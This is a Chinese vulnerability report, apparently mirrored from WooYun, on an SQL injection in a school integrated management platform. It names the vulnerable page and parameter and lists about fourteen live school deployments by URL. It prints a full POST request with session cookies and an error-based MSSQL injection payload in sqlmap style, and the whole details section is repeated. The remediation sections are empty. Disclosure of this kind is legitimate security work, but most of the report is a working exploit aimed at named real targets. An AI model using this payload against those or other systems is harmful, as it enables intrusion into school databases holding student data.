某学生综合管理系统通用SQL注入漏洞

来源

http://wooyun.org/bugs/wooyun-2015-0102431

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：某学生综合管理系统通用SQL注入漏洞 ### 详细说明：系统名称：学校综合管理平台厂商：上海安脉计算机科技有限公司关键字：版权所有：上海安脉计算机科技有限公司系统架构：ASPX+MSSQL 漏洞文件：ST_Manage/SystemManage/MaterialSetting.aspx 注入参数：hidmaterid 枚举部分案例： http://anmai.net:81/ http://jwxx.am.jsedu.sh.cn/ANMAI/ http://bssyxxgl.eicbs.com/ http://cjzx.am.jsedu.sh.cn/ http://glpt.nhshs.edu.sh.cn/ http://218.78.241.80/anmai/ http://www.aqyz.net/anmai/ http://218.22.96.74:8899/anmai/ http://120.69.153.68:8002/anmai654202_458357247/ http://222.82.229.202:2010/anmai/ http://58.118.20.5/anmai/ http://124.228.32.115:81/ http://luoxzx.am.jsedu.sh.cn/ http://www.syzxyz.com:8008/ 等等漏洞验证：官网为例： http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx [<img src="https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png) ``` POST /ST_Manage/SystemManage/MaterialSetting.aspx HTTP/1.1 Host: anmai.net:81 Proxy-Connection: keep-alive Content-Length: 837 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://anmai.net:81 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: %d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4=%d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4%7cSF_Manage%2findex.aspx%3ftype%3d4%26a%3d2; %cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2=%cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2%7cSF_Manage%2findex.aspx%3ftype%3d2%26a%3d5; %bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed=%bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed%7cSF_Manage%2findex.aspx%3ftype%3d3%26a%3d4; ASP.NET_SessionId=trqrt52wfcm2342nhvjzwx45; ASPSESSIONIDASDDACDA=ALJPFGODEGILBMFOALMMAPPC; %bd%cc%b2%c4%c9%e8%d6%c3=%bd%cc%b2%c4%c9%e8%d6%c3%7cST_Manage%2fSystemManage%2fSysDefault.aspx%3ftype%3d1 __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDU%2BOz47bDx0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHVlPScxMCdcPuWInemihOWkh%2BePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGsxJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrMicgdmFsdWU9JzEyJ1w%2B5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w%2B6auY5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a%2F9WF0W0xI8wS2b&action1=doAdd&hidmaterid=&txtid=&txtjiaocainame=aaaa&chk1=11 ``` 漏洞验证： ``` Place: POST Parameter: hidmaterid Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs O2w8dDw7bDxpPDU Oz47bDx 0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHV lPScxMCdcPuWInemihOWkh ePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs xJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmF tZT0nY2hrMicgdmFsdWU9JzEyJ1w 5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2t ib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU 9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB 1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w 6auY5LqM5bm057qnJm5ic3B cO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe 6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a/9WF0W0xI8wS2b&action1=doAdd&hidmater id=-2193' OR 2848=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(116) CHAR(58) ( SELECT (CASE WHEN (2848=2848) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(11 5) CHAR(122) CHAR(107) CHAR(58))) AND 'XCru'='XCru&txtid=&txtjiaocainame=aaaa&ch k1=11 --- ``` [<img src="https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png) 数据库： [<img src="https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png) ### 漏洞证明：系统名称：学校综合管理平台厂商：上海安脉计算机科技有限公司关键字：版权所有：上海安脉计算机科技有限公司系统架构：ASPX+MSSQL 漏洞文件：ST_Manage/SystemManage/MaterialSetting.aspx 注入参数：hidmaterid 枚举部分案例： http://anmai.net:81/ http://jwxx.am.jsedu.sh.cn/ANMAI/ http://bssyxxgl.eicbs.com/ http://cjzx.am.jsedu.sh.cn/ http://glpt.nhshs.edu.sh.cn/ http://218.78.241.80/anmai/ http://www.aqyz.net/anmai/ http://218.22.96.74:8899/anmai/ http://120.69.153.68:8002/anmai654202_458357247/ http://222.82.229.202:2010/anmai/ http://58.118.20.5/anmai/ http://124.228.32.115:81/ http://luoxzx.am.jsedu.sh.cn/ http://www.syzxyz.com:8008/ 等等漏洞验证：官网为例： http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx [<img src="https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png) ``` POST /ST_Manage/SystemManage/MaterialSetting.aspx HTTP/1.1 Host: anmai.net:81 Proxy-Connection: keep-alive Content-Length: 837 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://anmai.net:81 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: %d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4=%d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4%7cSF_Manage%2findex.aspx%3ftype%3d4%26a%3d2; %cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2=%cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2%7cSF_Manage%2findex.aspx%3ftype%3d2%26a%3d5; %bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed=%bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed%7cSF_Manage%2findex.aspx%3ftype%3d3%26a%3d4; ASP.NET_SessionId=trqrt52wfcm2342nhvjzwx45; ASPSESSIONIDASDDACDA=ALJPFGODEGILBMFOALMMAPPC; %bd%cc%b2%c4%c9%e8%d6%c3=%bd%cc%b2%c4%c9%e8%d6%c3%7cST_Manage%2fSystemManage%2fSysDefault.aspx%3ftype%3d1 __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDU%2BOz47bDx0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHVlPScxMCdcPuWInemihOWkh%2BePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGsxJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrMicgdmFsdWU9JzEyJ1w%2B5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w%2B6auY5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a%2F9WF0W0xI8wS2b&action1=doAdd&hidmaterid=&txtid=&txtjiaocainame=aaaa&chk1=11 ``` 漏洞验证： ``` Place: POST Parameter: hidmaterid Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs O2w8dDw7bDxpPDU Oz47bDx 0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHV lPScxMCdcPuWInemihOWkh ePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs xJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmF tZT0nY2hrMicgdmFsdWU9JzEyJ1w 5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2t ib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU 9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB 1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w 6auY5LqM5bm057qnJm5ic3B cO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe 6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a/9WF0W0xI8wS2b&action1=doAdd&hidmater id=-2193' OR 2848=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(116) CHAR(58) ( SELECT (CASE WHEN (2848=2848) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(11 5) CHAR(122) CHAR(107) CHAR(58))) AND 'XCru'='XCru&txtid=&txtjiaocainame=aaaa&ch k1=11 --- ``` [<img src="https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png) 数据库： [<img src="https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-0102431

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

某学生综合管理系统通用SQL注入漏洞

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定